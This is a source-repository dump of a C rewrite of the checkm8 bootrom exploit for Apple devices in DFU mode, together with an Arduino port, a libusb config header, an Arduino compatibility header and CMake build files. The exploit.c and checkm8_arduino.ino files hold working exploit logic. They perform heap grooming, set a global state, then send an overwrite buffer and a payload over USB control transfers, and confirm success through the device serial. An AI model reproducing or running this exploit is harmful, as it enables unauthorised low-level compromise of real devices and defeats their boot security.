to 1 if you have the header file. */ 74 | /* #undef HAVE_SYS_SOCKET_H */ 75 | 76 | /* Define to 1 if you have the header file. */ 77 | #define HAVE_SYS_STAT_H 1 78 | 79 | /* Define to 1 if you have the header file. */ 80 | #define HAVE_SYS_TIME_H 1 81 | 82 | /* Define to 1 if you have the header file. */ 83 | #define HAVE_SYS_TYPES_H 1 84 | 85 | /* Define to 1 if you have the header file. */ 86 | #define HAVE_UNISTD_H 1 87 | 88 | /* Define to the sub-directory where libtool stores uninstalled libraries. */ 89 | #define LT_OBJDIR ".libs/" 90 | 91 | /* Darwin backend */ 92 | /* #undef OS_DARWIN */ 93 | 94 | /* Haiku backend */ 95 | /* #undef OS_HAIKU */ 96 | 97 | /* Linux backend */ 98 | #define OS_LINUX 1 99 | 100 | /* NetBSD backend */ 101 | /* #undef OS_NETBSD */ 102 | 103 | /* OpenBSD backend */ 104 | /* #undef OS_OPENBSD */ 105 | 106 | /* SunOS backend */ 107 | /* #undef OS_SUNOS */ 108 | 109 | /* Windows backend */ 110 | /* #undef OS_WINDOWS */ 111 | 112 | /* Name of package */ 113 | #define PACKAGE "src" 114 | 115 | /* Define to the address where bug reports for this package should be sent. */ 116 | #define PACKAGE_BUGREPORT "src-devel@lists.sourceforge.net" 117 | 118 | /* Define to the full name of this package. */ 119 | #define PACKAGE_NAME "src" 120 | 121 | /* Define to the full name and version of this package. */ 122 | #define PACKAGE_STRING "src 1.0.23" 123 | 124 | /* Define to the one symbol short name of this package. */ 125 | #define PACKAGE_TARNAME "src" 126 | 127 | /* Define to the home page for this package. */ 128 | #define PACKAGE_URL "http://src.info" 129 | 130 | /* Define to the version of this package. */ 131 | #define PACKAGE_VERSION "1.0.23" 132 | 133 | /* type of second poll() argument */ 134 | #define POLL_NFDS_TYPE nfds_t 135 | 136 | /* Define to 1 if you have the ANSI C header files. */ 137 | #define STDC_HEADERS 1 138 | 139 | /* Use POSIX Threads */ 140 | #define THREADS_POSIX 1 141 | 142 | /* timerfd headers available */ 143 | #define USBI_TIMERFD_AVAILABLE 1 144 | 145 | /* Enable output to system log */ 146 | /* #undef USE_SYSTEM_LOGGING_FACILITY */ 147 | 148 | /* Use udev for device enumeration/hotplug */ 149 | #define USE_UDEV 1 150 | 151 | /* Version number of package */ 152 | #define VERSION "1.0.23" 153 | 154 | /* Oldest Windows version supported */ 155 | /* #undef WINVER */ 156 | 157 | /* Use GNU extensions */ 158 | #define _GNU_SOURCE 1 159 | 160 | /* Oldest Windows version supported */ 161 | /* #undef _WIN32_WINNT */ 162 | 163 | /* Define to `__inline__' or `__inline' if that's what the C compiler 164 | calls it, or to nothing if 'inline' is not supported under any name. */ 165 | #ifndef __cplusplus 166 | /* #undef inline */ 167 | #endif 168 | -------------------------------------------------------------------------------- /checkm8_remote/src/exploit.c: -------------------------------------------------------------------------------- 1 | #include "checkm8.h" 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #include "libusb_helpers.h" 9 | #include "libusb.h" 10 | 11 | typedef int(stage_function)(struct pwned_device *dev); 12 | 13 | int complete_stage(struct pwned_device *device, stage_function *func) 14 | { 15 | checkm8_debug_indent("complete_stage(dev = %p, func = %p)\n", device, func); 16 | int ret; 17 | 18 | ret = get_device_bundle(device); 19 | if(ret == LIBUSB_ERROR_NO_DEVICE || ret == LIBUSB_ERROR_ACCESS) 20 | { 21 | checkm8_debug_indent("\tfailed to get device bundle\n"); 22 | return CHECKM8_FAIL_NODEV; 23 | } 24 | 25 | checkm8_debug_indent("\tgot device bundle, calling function\n"); 26 | ret = func(device); 27 | 28 | checkm8_debug_indent("\treleasing device bundle\n"); 29 | release_device_bundle(device); 30 | 31 | return ret; 32 | } 33 | 34 | int stage1_function(struct pwned_device *dev) 35 | { 36 | checkm8_debug_indent("exploit stage 1\n"); 37 | unsigned int i; 38 | 39 | stall(dev); 40 | for(i = 0; i < 5; i++) 41 | { 42 | no_leak(dev); 43 | } 44 | usb_req_leak(dev); 45 | no_leak(dev); 46 | 47 | checkm8_debug_indent("\treset\n"); 48 | libusb_reset_device(dev->bundle->handle); 49 | return CHECKM8_SUCCESS; 50 | } 51 | 52 | int stage2_function(struct pwned_device *dev) 53 | { 54 | checkm8_debug_indent("exploit stage 2\n"); 55 | unsigned char databuf[0x800]; 56 | memset(databuf, 'A', 0x800); 57 | 58 | libusb1_async_ctrl_transfer(dev, 0x21, 1, 0, 0, databuf, 0x800, 1); 59 | libusb1_no_error_ctrl_transfer(dev, 0x21, 4, 0, 0, NULL, 0, 0); 60 | 61 | checkm8_debug_indent("\treset\n"); 62 | libusb_reset_device(dev->bundle->handle); 63 | return CHECKM8_SUCCESS; 64 | } 65 | 66 | int stage3_function(struct pwned_device *dev) 67 | { 68 | checkm8_debug_indent("exploit stage 3\n"); 69 | unsigned char overwrite_buf[1524]; 70 | FILE *overwrite_file = fopen(CHECKM8_BIN_BASE "overwrite.bin", "r"); 71 | fread(overwrite_buf, 1524, 1, overwrite_file); 72 | fclose(overwrite_file); 73 | 74 | unsigned char payload_buf[2400]; 75 | FILE *payload_file = fopen(CHECKM8_BIN_BASE "payload.bin", "r"); 76 | fread(payload_buf, 2400, 1, payload_file); 77 | fclose(payload_file); 78 | 79 | usb_req_stall(dev); 80 | usb_req_leak(dev); 81 | 82 | checkm8_debug_indent("\ttransferring overwrite\n"); 83 | libusb1_no_error_ctrl_transfer(dev, 0, 0, 0, 0, overwrite_buf, 1524, 100); 84 | 85 | checkm8_debug_indent("\ttransferring payload\n"); 86 | libusb1_no_error_ctrl_transfer(dev, 0x21, 1, 0, 0, payload_buf, 2048, 100); 87 | libusb1_no_error_ctrl_transfer(dev, 0x21, 1, 0, 0, &payload_buf[2048], 352, 100); 88 | 89 | checkm8_debug_indent("reset\n"); 90 | libusb_reset_device(dev->bundle->handle); 91 | return CHECKM8_SUCCESS; 92 | } 93 | 94 | int check_function(struct pwned_device *dev) 95 | { 96 | checkm8_debug_indent("checking device serial\n"); 97 | unsigned char serial_buf[128]; 98 | unsigned int i; 99 | struct libusb_device_handle *handle = dev->bundle->handle; 100 | struct libusb_device_descriptor *desc = dev->bundle->descriptor; 101 | 102 | libusb_get_string_descriptor_ascii(handle, desc->iSerialNumber, serial_buf, sizeof(serial_buf)); 103 | checkm8_debug_indent("\tgot serial %s\n", serial_buf); 104 | 105 | for(i = 0; i < 13; i++) 106 | { 107 | if(serial_buf[99 + i] != "PWND:[checkm8]"[i]) 108 | { 109 | return CHECKM8_FAIL_NOEXP; 110 | } 111 | } 112 | 113 | return CHECKM8_SUCCESS; 114 | } 115 | 116 | struct pwned_device *exploit_device() 117 | { 118 | struct pwned_device *res = calloc(1, sizeof(struct pwned_device)); 119 | res->status = DEV_NORMAL; 120 | res->bundle = calloc(1, sizeof(struct libusb_device_bundle)); 121 | res->idVendor = DEV_IDVENDOR; 122 | res->idProduct = DEV_IDPRODUCT; 123 | 124 | checkm8_debug_indent("exploit_device() -> dev = %p\n", res); 125 | 126 | int ret = complete_stage(res, check_function); 127 | if(ret == CHECKM8_SUCCESS) 128 | { 129 | // already exploited 130 | res->status = DEV_PWNED; 131 | return res; 132 | } 133 | else if(ret == CHECKM8_FAIL_NODEV) 134 | { 135 | // no device found 136 | free(res); 137 | return NULL; 138 | } 139 | else 140 | { 141 | // normal device found - exploit 142 | ret = complete_stage(res, stage1_function); 143 | if(ret == CHECKM8_SUCCESS) 144 | { 145 | ret = complete_stage(res, stage2_function); 146 | usleep(500000); 147 | } 148 | 149 | if(ret == CHECKM8_SUCCESS) 150 | { 151 | ret = complete_stage(res, stage3_function); 152 | usleep(500000); 153 | } 154 | 155 | if(ret == CHECKM8_SUCCESS) 156 | { 157 | ret = complete_stage(res, check_function); 158 | } 159 | 160 | if(ret == CHECKM8_SUCCESS) 161 | { 162 | res->status = DEV_PWNED; 163 | return res; 164 | } 165 | else return NULL; 166 | } 167 | } 168 | 169 | void free_device(struct pwned_device *dev) 170 | { 171 | release_device_bundle(dev); 172 | free(dev); 173 | } -------------------------------------------------------------------------------- /checkm8_arduino/lib/hostshield/version_helper.h: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2011 Circuits At Home, LTD. All rights reserved. 2 | 3 | This program is free software; you can redistribute it and/or modify 4 | it under the terms of the GNU General Public License as published by 5 | the Free Software Foundation; either version 2 of the License, or 6 | (at your option) any later version. 7 | 8 | This program is distributed in the hope that it will be useful, 9 | but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | GNU General Public License for more details. 12 | 13 | You should have received a copy of the GNU General Public License 14 | along with this program; if not, write to the Free Software 15 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 16 | 17 | Contact information 18 | ------------------- 19 | 20 | Circuits At Home, LTD 21 | Web : http://www.circuitsathome.com 22 | e-mail : support@circuitsathome.com 23 | */ 24 | 25 | /* 26 | * Universal Arduino(tm) "IDE" fixups. 27 | * Includes fixes for versions as low as 0023, used by Digilent. 28 | */ 29 | 30 | #if defined(ARDUINO) && ARDUINO >=100 31 | #include 32 | #else 33 | #include 34 | #include 35 | #ifdef __AVR__ 36 | #include 37 | #include 38 | #else 39 | #endif 40 | #endif 41 | 42 | #ifndef __PGMSPACE_H_ 43 | #define __PGMSPACE_H_ 1 44 | 45 | #include 46 | 47 | #ifndef PROGMEM 48 | #define PROGMEM 49 | #endif 50 | #ifndef PGM_P 51 | #define PGM_P const char * 52 | #endif 53 | #ifndef PSTR 54 | #define PSTR(str) (str) 55 | #endif 56 | #ifndef F 57 | #define F(str) (str) 58 | #endif 59 | #ifndef _SFR_BYTE 60 | #define _SFR_BYTE(n) (n) 61 | #endif 62 | 63 | #ifndef memchr_P 64 | #define memchr_P(str, c, len) memchr((str), (c), (len)) 65 | #endif 66 | #ifndef memcmp_P 67 | #define memcmp_P(a, b, n) memcmp((a), (b), (n)) 68 | #endif 69 | #ifndef memcpy_P 70 | #define memcpy_P(dest, src, num) memcpy((dest), (src), (num)) 71 | #endif 72 | #ifndef memmem_P 73 | #define memmem_P(a, alen, b, blen) memmem((a), (alen), (b), (blen)) 74 | #endif 75 | #ifndef memrchr_P 76 | #define memrchr_P(str, val, len) memrchr((str), (val), (len)) 77 | #endif 78 | #ifndef strcat_P 79 | #define strcat_P(dest, src) strcat((dest), (src)) 80 | #endif 81 | #ifndef strchr_P 82 | #define strchr_P(str, c) strchr((str), (c)) 83 | #endif 84 | #ifndef strchrnul_P 85 | #define strchrnul_P(str, c) strchrnul((str), (c)) 86 | #endif 87 | #ifndef strcmp_P 88 | #define strcmp_P(a, b) strcmp((a), (b)) 89 | #endif 90 | #ifndef strcpy_P 91 | #define strcpy_P(dest, src) strcpy((dest), (src)) 92 | #endif 93 | #ifndef strcasecmp_P 94 | #define strcasecmp_P(a, b) strcasecmp((a), (b)) 95 | #endif 96 | #ifndef strcasestr_P 97 | #define strcasestr_P(a, b) strcasestr((a), (b)) 98 | #endif 99 | #ifndef strlcat_P 100 | #define strlcat_P(dest, src, len) strlcat((dest), (src), (len)) 101 | #endif 102 | #ifndef strlcpy_P 103 | #define strlcpy_P(dest, src, len) strlcpy((dest), (src), (len)) 104 | #endif 105 | #ifndef strlen_P 106 | #define strlen_P(s) strlen((const char *)(s)) 107 | #endif 108 | #ifndef strnlen_P 109 | #define strnlen_P(str, len) strnlen((str), (len)) 110 | #endif 111 | #ifndef strncmp_P 112 | #define strncmp_P(a, b, n) strncmp((a), (b), (n)) 113 | #endif 114 | #ifndef strncasecmp_P 115 | #define strncasecmp_P(a, b, n) strncasecmp((a), (b), (n)) 116 | #endif 117 | #ifndef strncat_P 118 | #define strncat_P(a, b, n) strncat((a), (b), (n)) 119 | #endif 120 | #ifndef strncpy_P 121 | #define strncpy_P(a, b, n) strncpy((a), (b), (n)) 122 | #endif 123 | #ifndef strpbrk_P 124 | #define strpbrk_P(str, chrs) strpbrk((str), (chrs)) 125 | #endif 126 | #ifndef strrchr_P 127 | #define strrchr_P(str, c) strrchr((str), (c)) 128 | #endif 129 | #ifndef strsep_P 130 | #define strsep_P(strp, delim) strsep((strp), (delim)) 131 | #endif 132 | #ifndef strspn_P 133 | #define strspn_P(str, chrs) strspn((str), (chrs)) 134 | #endif 135 | #ifndef strstr_P 136 | #define strstr_P(a, b) strstr((a), (b)) 137 | #endif 138 | #ifndef sprintf_P 139 | #define sprintf_P(s, ...) sprintf((s), __VA_ARGS__) 140 | #endif 141 | #ifndef vfprintf_P 142 | #define vfprintf_P(s, ...) vfprintf((s), __VA_ARGS__) 143 | #endif 144 | #ifndef printf_P 145 | #define printf_P(...) printf(__VA_ARGS__) 146 | #endif 147 | #ifndef snprintf_P 148 | #define snprintf_P(s, n, ...) ((s), (n), __VA_ARGS__) 149 | #endif 150 | #ifndef vsprintf_P 151 | #define vsprintf_P(s, ...) ((s),__VA_ARGS__) 152 | #endif 153 | #ifndef vsnprintf_P 154 | #define vsnprintf_P(s, n, ...) ((s), (n),__VA_ARGS__) 155 | #endif 156 | #ifndef fprintf_P 157 | #define fprintf_P(s, ...) ((s), __VA_ARGS__) 158 | #endif 159 | 160 | #ifndef pgm_read_byte 161 | #define pgm_read_byte(addr) (*(const unsigned char *)(addr)) 162 | #endif 163 | #ifndef pgm_read_word 164 | #define pgm_read_word(addr) (*(const unsigned short *)(addr)) 165 | #endif 166 | #ifndef pgm_read_dword 167 | #define pgm_read_dword(addr) (*(const unsigned long *)(addr)) 168 | #endif 169 | #ifndef pgm_read_float 170 | #define pgm_read_float(addr) (*(const float *)(addr)) 171 | #endif 172 | 173 | #ifndef pgm_read_byte_near 174 | #define pgm_read_byte_near(addr) pgm_read_byte(addr) 175 | #endif 176 | #ifndef pgm_read_word_near 177 | #define pgm_read_word_near(addr) pgm_read_word(addr) 178 | #endif 179 | #ifndef pgm_read_dword_near 180 | #define pgm_read_dword_near(addr) pgm_read_dword(addr) 181 | #endif 182 | #ifndef pgm_read_float_near 183 | #define pgm_read_float_near(addr) pgm_read_float(addr) 184 | #endif 185 | #ifndef pgm_read_byte_far 186 | #define pgm_read_byte_far(addr) pgm_read_byte(addr) 187 | #endif 188 | #ifndef pgm_read_word_far 189 | #define pgm_read_word_far(addr) pgm_read_word(addr) 190 | #endif 191 | #ifndef pgm_read_dword_far 192 | #define pgm_read_dword_far(addr) pgm_read_dword(addr) 193 | #endif 194 | #ifndef pgm_read_float_far 195 | #define pgm_read_float_far(addr) pgm_read_float(addr) 196 | #endif 197 | 198 | #ifndef pgm_read_pointer 199 | #define pgm_read_pointer 200 | #endif 201 | #endif 202 | -------------------------------------------------------------------------------- /checkm8_arduino/src/checkm8_arduino.ino: -------------------------------------------------------------------------------- 1 | #include 2 | #include "constants.h" 3 | 4 | USB Usb; 5 | uint8_t addr = 1; 6 | USB_DEVICE_DESCRIPTOR desc_buf; 7 | uint8_t io_buf[0x100]; 8 | EpInfo *pep = NULL; 9 | uint16_t nak_limit = 0; 10 | uint8_t rcode; 11 | uint8_t last_state, state; 12 | uint8_t pktsize; 13 | uint16_t sz; 14 | const uint8_t * p; 15 | uint16_t part_sz; 16 | enum { 17 | CHECKM8_INIT_RESET, 18 | CHECKM8_HEAP_FENG_SHUI, 19 | CHECKM8_SET_GLOBAL_STATE, 20 | CHECKM8_HEAP_OCCUPATION, 21 | CHECKM8_END 22 | }; 23 | uint8_t checkm8_state = CHECKM8_INIT_RESET; 24 | 25 | uint8_t send_out(uint8_t * io_buf, uint8_t pktsize) 26 | { 27 | Usb.bytesWr(rSNDFIFO, pktsize, io_buf); 28 | Usb.regWr(rSNDBC, pktsize); 29 | Usb.regWr(rHXFR, tokOUT); 30 | while(!(Usb.regRd(rHIRQ) & bmHXFRDNIRQ)); 31 | Usb.regWr(rHIRQ, bmHXFRDNIRQ); 32 | return (Usb.regRd(rHRSL) & 0x0f); 33 | } 34 | 35 | void setup() { 36 | Serial.begin(115200); 37 | Serial.println("checkm8 started"); 38 | if(Usb.Init() == -1) 39 | Serial.println("usb init error"); 40 | delay(200); 41 | } 42 | 43 | void loop() { 44 | Usb.Task(); 45 | state = Usb.getUsbTaskState(); 46 | if(state != last_state) 47 | { 48 | //Serial.print("usb state: "); Serial.println(state, HEX); 49 | last_state = state; 50 | } 51 | if(state == USB_STATE_ERROR) 52 | { 53 | Usb.setUsbTaskState(USB_ATTACHED_SUBSTATE_RESET_DEVICE); 54 | } 55 | if(state == USB_STATE_RUNNING) 56 | { 57 | Usb.getDevDescr(addr, 0, 0x12, (uint8_t *) &desc_buf); 58 | if(desc_buf.idVendor != 0x5ac || desc_buf.idProduct != 0x1227) 59 | { 60 | Usb.setUsbTaskState(USB_ATTACHED_SUBSTATE_RESET_DEVICE); 61 | if(checkm8_state != CHECKM8_END) 62 | { 63 | Serial.print("Non Apple DFU found (vendorId: "); Serial.print(desc_buf.idVendor); Serial.print(", productId: "); Serial.print(desc_buf.idProduct); Serial.println(")"); 64 | delay(5000); 65 | } 66 | return; 67 | } 68 | switch(checkm8_state) 69 | { 70 | case CHECKM8_INIT_RESET: 71 | for(int i = 0; i < 3; i++) 72 | { 73 | digitalWrite(6, HIGH); 74 | delay(500); 75 | digitalWrite(6, LOW); 76 | delay(500); 77 | } 78 | checkm8_state = CHECKM8_HEAP_FENG_SHUI; 79 | Usb.setUsbTaskState(USB_ATTACHED_SUBSTATE_RESET_DEVICE); 80 | break; 81 | case CHECKM8_HEAP_FENG_SHUI: 82 | heap_feng_shui(); 83 | checkm8_state = CHECKM8_SET_GLOBAL_STATE; 84 | Usb.setUsbTaskState(USB_ATTACHED_SUBSTATE_RESET_DEVICE); 85 | break; 86 | case CHECKM8_SET_GLOBAL_STATE: 87 | set_global_state(); 88 | checkm8_state = CHECKM8_HEAP_OCCUPATION; 89 | while(Usb.getUsbTaskState() != USB_DETACHED_SUBSTATE_WAIT_FOR_DEVICE) { Usb.Task(); } 90 | break; 91 | case CHECKM8_HEAP_OCCUPATION: 92 | heap_occupation(); 93 | checkm8_state = CHECKM8_END; 94 | Usb.setUsbTaskState(USB_ATTACHED_SUBSTATE_RESET_DEVICE); 95 | break; 96 | case CHECKM8_END: 97 | digitalWrite(6, HIGH); 98 | break; 99 | } 100 | } 101 | } 102 | 103 | void heap_feng_shui_req(uint8_t sz) 104 | { 105 | rcode = Usb.ctrlReq_SETUP(addr, 0, 0x80, 6, 4, 3, 0x40a, sz); 106 | Usb.regWr(rHCTL, bmRCVTOG1); 107 | rcode = Usb.dispatchPkt(tokIN, 0, 0); 108 | } 109 | 110 | void heap_feng_shui() 111 | { 112 | Serial.println("1. heap feng-shui"); 113 | heap_feng_shui_req(0xc0); 114 | heap_feng_shui_req(0xc0); 115 | for(int i = 0; i < 6; i++) 116 | heap_feng_shui_req(0xc1); 117 | } 118 | 119 | void set_global_state() 120 | { 121 | Serial.println("2. set global state"); 122 | rcode = Usb.ctrlReq_SETUP(addr, 0, 0x21, 1, 0, 0, 0, 0x800); 123 | rcode = Usb.dispatchPkt(tokOUTHS, 0, 0); 124 | rcode = Usb.ctrlReq(addr, 0, 0x21, 4, 0, 0, 0, 0, 0, NULL, NULL); 125 | } 126 | 127 | void heap_occupation() 128 | { 129 | Serial.println("3. heap occupation"); 130 | 131 | heap_feng_shui_req(0xc1); 132 | heap_feng_shui_req(0xc1); 133 | heap_feng_shui_req(0xc1); 134 | 135 | 136 | sz = sizeof(overwrite); 137 | p = overwrite; 138 | rcode = Usb.ctrlReq_SETUP(addr, 0, 0, 9, 0, 0, 0, sz); 139 | Usb.regWr(rHCTL, bmSNDTOG0); 140 | send_out(io_buf, 0); 141 | while(sz) 142 | { 143 | pktsize = min(sz, 0x40); 144 | for(int i = 0; i < pktsize; i++) 145 | io_buf[i] = pgm_read_byte(&p[i]); 146 | send_out(io_buf, pktsize); 147 | if(rcode) 148 | { 149 | Serial.println("sending error"); 150 | checkm8_state = CHECKM8_END; 151 | return; 152 | } 153 | sz -= pktsize; 154 | p += pktsize; 155 | } 156 | 157 | sz = sizeof(payload); 158 | p = payload; 159 | 160 | while(sz) 161 | { 162 | part_sz = min(0x7ff, sz); 163 | sz -= part_sz; 164 | rcode = Usb.ctrlReq_SETUP(addr, 0, 0x21, 1, 0, 0, 0, part_sz); 165 | Usb.regWr(rHCTL, bmSNDTOG0); 166 | send_out(io_buf, 0); 167 | while(part_sz) { 168 | pktsize = min(part_sz, 0x40); 169 | for(int i = 0; i < pktsize; i++) 170 | io_buf[i] = pgm_read_byte(&p[i]); 171 | send_out(io_buf, pktsize); 172 | if(rcode) 173 | { 174 | Serial.println("sending error"); 175 | checkm8_state = CHECKM8_END; 176 | return; 177 | } 178 | part_sz -= pktsize; 179 | p += pktsize; 180 | } 181 | Serial.print("Payload loading... "); Serial.print(sizeof(payload) - sz); Serial.print("/"); Serial.println(sizeof(payload)); 182 | } 183 | } -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_aes.dir/build.make: -------------------------------------------------------------------------------- 1 | # CMAKE generated file: DO NOT EDIT! 2 | # Generated by "Unix Makefiles" Generator, CMake Version 3.10 3 | 4 | # Delete rule output on recipe failure. 5 | .DELETE_ON_ERROR: 6 | 7 | 8 | #============================================================================= 9 | # Special targets provided by cmake. 10 | 11 | # Disable implicit rules so canonical targets will work. 12 | .SUFFIXES: 13 | 14 | 15 | # Remove some rules from gmake that .SUFFIXES does not remove. 16 | SUFFIXES = 17 | 18 | .SUFFIXES: .hpux_make_needs_suffix_list 19 | 20 | 21 | # Suppress display of executed commands. 22 | $(VERBOSE).SILENT: 23 | 24 | 25 | # A target that is always out of date. 26 | cmake_force: 27 | 28 | .PHONY : cmake_force 29 | 30 | #============================================================================= 31 | # Set environment variables for the build. 32 | 33 | # The shell in which to execute make rules. 34 | SHELL = /bin/sh 35 | 36 | # The CMake executable. 37 | CMAKE_COMMAND = /usr/bin/cmake 38 | 39 | # The command to remove a file. 40 | RM = /usr/bin/cmake -E remove -f 41 | 42 | # Escaping for special characters. 43 | EQUALS = = 44 | 45 | # The top-level source directory on which CMake was run. 46 | CMAKE_SOURCE_DIR = /home/toor/ipwndfu_rewrite_c 47 | 48 | # The top-level build directory on which CMake was run. 49 | CMAKE_BINARY_DIR = /home/toor/ipwndfu_rewrite_c 50 | 51 | # Include any dependencies generated for this target. 52 | include checkm8_payloads/CMakeFiles/payload_aes.dir/depend.make 53 | 54 | # Include the progress variables for this target. 55 | include checkm8_payloads/CMakeFiles/payload_aes.dir/progress.make 56 | 57 | # Include the compile flags for this target's objects. 58 | include checkm8_payloads/CMakeFiles/payload_aes.dir/flags.make 59 | 60 | checkm8_payloads/CMakeFiles/payload_aes.dir/src/aes.c.o: checkm8_payloads/CMakeFiles/payload_aes.dir/flags.make 61 | checkm8_payloads/CMakeFiles/payload_aes.dir/src/aes.c.o: checkm8_payloads/src/aes.c 62 | @$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --green --progress-dir=/home/toor/ipwndfu_rewrite_c/CMakeFiles --progress-num=$(CMAKE_PROGRESS_1) "Building C object checkm8_payloads/CMakeFiles/payload_aes.dir/src/aes.c.o" 63 | cd /home/toor/ipwndfu_rewrite_c/checkm8_payloads && /usr/bin/aarch64-linux-gnu-gcc $(C_DEFINES) $(C_INCLUDES) $(C_FLAGS) -o CMakeFiles/payload_aes.dir/src/aes.c.o -c /home/toor/ipwndfu_rewrite_c/checkm8_payloads/src/aes.c 64 | 65 | checkm8_payloads/CMakeFiles/payload_aes.dir/src/aes.c.i: cmake_force 66 | @$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --green "Preprocessing C source to CMakeFiles/payload_aes.dir/src/aes.c.i" 67 | cd /home/toor/ipwndfu_rewrite_c/checkm8_payloads && /usr/bin/aarch64-linux-gnu-gcc $(C_DEFINES) $(C_INCLUDES) $(C_FLAGS) -E /home/toor/ipwndfu_rewrite_c/checkm8_payloads/src/aes.c > CMakeFiles/payload_aes.dir/src/aes.c.i 68 | 69 | checkm8_payloads/CMakeFiles/payload_aes.dir/src/aes.c.s: cmake_force 70 | @$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --green "Compiling C source to assembly CMakeFiles/payload_aes.dir/src/aes.c.s" 71 | cd /home/toor/ipwndfu_rewrite_c/checkm8_payloads && /usr/bin/aarch64-linux-gnu-gcc $(C_DEFINES) $(C_INCLUDES) $(C_FLAGS) -S /home/toor/ipwndfu_rewrite_c/checkm8_payloads/src/aes.c -o CMakeFiles/payload_aes.dir/src/aes.c.s 72 | 73 | checkm8_payloads/CMakeFiles/payload_aes.dir/src/aes.c.o.requires: 74 | 75 | .PHONY : checkm8_payloads/CMakeFiles/payload_aes.dir/src/aes.c.o.requires 76 | 77 | checkm8_payloads/CMakeFiles/payload_aes.dir/src/aes.c.o.provides: checkm8_payloads/CMakeFiles/payload_aes.dir/src/aes.c.o.requires 78 | $(MAKE) -f checkm8_payloads/CMakeFiles/payload_aes.dir/build.make checkm8_payloads/CMakeFiles/payload_aes.dir/src/aes.c.o.provides.build 79 | .PHONY : checkm8_payloads/CMakeFiles/payload_aes.dir/src/aes.c.o.provides 80 | 81 | checkm8_payloads/CMakeFiles/payload_aes.dir/src/aes.c.o.provides.build: checkm8_payloads/CMakeFiles/payload_aes.dir/src/aes.c.o 82 | 83 | 84 | # Object files for target payload_aes 85 | payload_aes_OBJECTS = \ 86 | "CMakeFiles/payload_aes.dir/src/aes.c.o" 87 | 88 | # External object files for target payload_aes 89 | payload_aes_EXTERNAL_OBJECTS = 90 | 91 | checkm8_payloads/payload_aes: checkm8_payloads/CMakeFiles/payload_aes.dir/src/aes.c.o 92 | checkm8_payloads/payload_aes: checkm8_payloads/CMakeFiles/payload_aes.dir/build.make 93 | checkm8_payloads/payload_aes: checkm8_payloads/CMakeFiles/payload_aes.dir/link.txt 94 | @$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --green --bold --progress-dir=/home/toor/ipwndfu_rewrite_c/CMakeFiles --progress-num=$(CMAKE_PROGRESS_2) "Linking C executable payload_aes" 95 | cd /home/toor/ipwndfu_rewrite_c/checkm8_payloads && $(CMAKE_COMMAND) -E cmake_link_script CMakeFiles/payload_aes.dir/link.txt --verbose=$(VERBOSE) 96 | cd /home/toor/ipwndfu_rewrite_c/checkm8_payloads && /usr/bin/aarch64-linux-gnu-objcopy -O binary -j .text -j .payload_text /home/toor/ipwndfu_rewrite_c/checkm8_payloads/payload_aes /home/toor/ipwndfu_rewrite_c/checkm8_payloads/bin/payload_aes.bin 97 | 98 | # Rule to build all files generated by this target. 99 | checkm8_payloads/CMakeFiles/payload_aes.dir/build: checkm8_payloads/payload_aes 100 | 101 | .PHONY : checkm8_payloads/CMakeFiles/payload_aes.dir/build 102 | 103 | checkm8_payloads/CMakeFiles/payload_aes.dir/requires: checkm8_payloads/CMakeFiles/payload_aes.dir/src/aes.c.o.requires 104 | 105 | .PHONY : checkm8_payloads/CMakeFiles/payload_aes.dir/requires 106 | 107 | checkm8_payloads/CMakeFiles/payload_aes.dir/clean: 108 | cd /home/toor/ipwndfu_rewrite_c/checkm8_payloads && $(CMAKE_COMMAND) -P CMakeFiles/payload_aes.dir/cmake_clean.cmake 109 | .PHONY : checkm8_payloads/CMakeFiles/payload_aes.dir/clean 110 | 111 | checkm8_payloads/CMakeFiles/payload_aes.dir/depend: 112 | cd /home/toor/ipwndfu_rewrite_c && $(CMAKE_COMMAND) -E cmake_depends "Unix Makefiles" /home/toor/ipwndfu_rewrite_c /home/toor/ipwndfu_rewrite_c/checkm8_payloads /home/toor/ipwndfu_rewrite_c /home/toor/ipwndfu_rewrite_c/checkm8_payloads /home/toor/ipwndfu_rewrite_c/checkm8_payloads/CMakeFiles/payload_aes.dir/DependInfo.cmake --color=$(COLOR) 113 | .PHONY : checkm8_payloads/CMakeFiles/payload_aes.dir/depend 114 | 115 | -------------------------------------------------------------------------------- /checkm8_payloads/CMakeFiles/payload_sync.dir/build.make: -------------------------------------------------------------------------------- 1 | # CMAKE generated file: DO NOT EDIT! 2 | # Generated by "Unix Makefiles" Generator, CMake Version 3.10 3 | 4 | # Delete rule output on recipe failure. 5 | .DELETE_ON_ERROR: 6 | 7 | 8 | #============================================================================= 9 | # Special targets provided by cmake. 10 | 11 | # Disable implicit rules so canonical targets will work. 12 | .SUFFIXES: 13 | 14 | 15 | # Remove some rules from gmake that .SUFFIXES does not remove. 16 | SUFFIXES = 17 | 18 | .SUFFIXES: .hpux_make_needs_suffix_list 19 | 20 | 21 | # Suppress display of executed commands. 22 | $(VERBOSE).SILENT: 23 | 24 | 25 | # A target that is always out of date. 26 | cmake_force: 27 | 28 | .PHONY : cmake_force 29 | 30 | #============================================================================= 31 | # Set environment variables for the build. 32 | 33 | # The shell in which to execute make rules. 34 | SHELL = /bin/sh 35 | 36 | # The CMake executable. 37 | CMAKE_COMMAND = /usr/bin/cmake 38 | 39 | # The command to remove a file. 40 | RM = /usr/bin/cmake -E remove -f 41 | 42 | # Escaping for special characters. 43 | EQUALS = = 44 | 45 | # The top-level source directory on which CMake was run. 46 | CMAKE_SOURCE_DIR = /home/toor/ipwndfu_rewrite_c 47 | 48 | # The top-level build directory on which CMake was run. 49 | CMAKE_BINARY_DIR = /home/toor/ipwndfu_rewrite_c 50 | 51 | # Include any dependencies generated for this target. 52 | include checkm8_payloads/CMakeFiles/payload_sync.dir/depend.make 53 | 54 | # Include the progress variables for this target. 55 | include checkm8_payloads/CMakeFiles/payload_sync.dir/progress.make 56 | 57 | # Include the compile flags for this target's objects. 58 | include checkm8_payloads/CMakeFiles/payload_sync.dir/flags.make 59 | 60 | checkm8_payloads/CMakeFiles/payload_sync.dir/src/sync.c.o: 